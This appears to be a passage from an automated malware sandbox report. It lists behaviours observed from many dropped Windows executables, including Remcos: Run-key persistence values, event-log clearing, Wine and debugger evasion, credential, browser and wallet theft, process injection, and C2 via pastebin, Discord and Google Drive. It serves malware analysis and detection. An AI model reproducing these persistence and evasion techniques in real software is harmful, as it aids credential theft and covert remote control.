N/A N/A C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\888.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\50to.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\50.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\qwex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\XW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\boleto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

Indicator Removal: Clear Windows Event Logs

defense_evasion
Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx C:\Windows\System32\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\SH.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boleto = "C:\\Users\\Admin\\AppData\\Roaming\\boleto.exe" C:\Users\Admin\AppData\Local\Temp\a\boleto.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\networkmanager.exe" C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" \??\c:\program files (x86)\internet explorer\iexplore.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" \??\c:\program files (x86)\internet explorer\iexplore.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftProfile = "C:\\Users\\Admin\\MicrosoftProfile.exe" C:\Users\Admin\AppData\Local\Temp\a\XW.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A discord.com N/A N/A
N/A pastebin.com N/A N/A
N/A discord.com N/A N/A
N/A drive.google.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A freegeoip.app N/A N/A
N/A freegeoip.app N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\ruts\11.reg C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File opened for modification C:\Windows\System32\Tasks\rutssvc64 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus C:\Windows\System32\dllhost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp C:\Windows\system32\lsass.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp C:\Windows\system32\lsass.exe N/A
File created C:\Windows\SysWOW64\ruts\rfusclient.exe C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock C:\Windows\system32\lsass.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp C:\Windows\system32\lsass.exe N/A
File opened for modification C:\Windows\System32\Tasks\boleto C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\MicrosoftProfile C:\Windows\system32\svchost.exe N/A
File created C:\Windows\SysWOW64\ruts\libeay32.dll C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new C:\Windows\system32\lsass.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\ruts C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs C:\Windows\System32\dllhost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp C:\Windows\system32\lsass.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\ruts\rutserv.exe C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File created C:\Windows\SysWOW64\ruts\ssleay32.dll C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File opened for modification C:\Windows\System32\Tasks\wod2 C:\Windows\system32\svchost.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3724 set thread context of 1644 N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 6040 set thread context of 6012 N/A C:\ProgramData\Remcos\remcos.exe \??\c:\program files (x86)\internet explorer\iexplore.exe
PID 6012 set thread context of 1192 N/A \??\c:\program files (x86)\internet explorer\iexplore.exe C:\Windows\SysWOW64\svchost.exe
PID 4688 set thread context of 6056 N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
PID 604 set thread context of 1328 N/A C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
PID 6100 set thread context of 1836 N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Windows\explorer.exe
PID 5032 set thread context of 5756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 664 set thread context of 808 N/A C:\Windows\system32\lsass.exe C:\Windows\system32\lsass.exe
PID 5160 set thread context of 1660 N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
PID 5596 set thread context of 2080 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 6196 set thread context of 1096 N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Windows\explorer.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\a\leto.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\a\leto.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\1014479001\c7611183bd.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\Remcos\remcos.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\1014485001\8541bb3477.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\systeminfo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\50.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\systeminfo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Remcos\remcos.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\program files (x86)\internet explorer\iexplore.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regedit.exe N/A
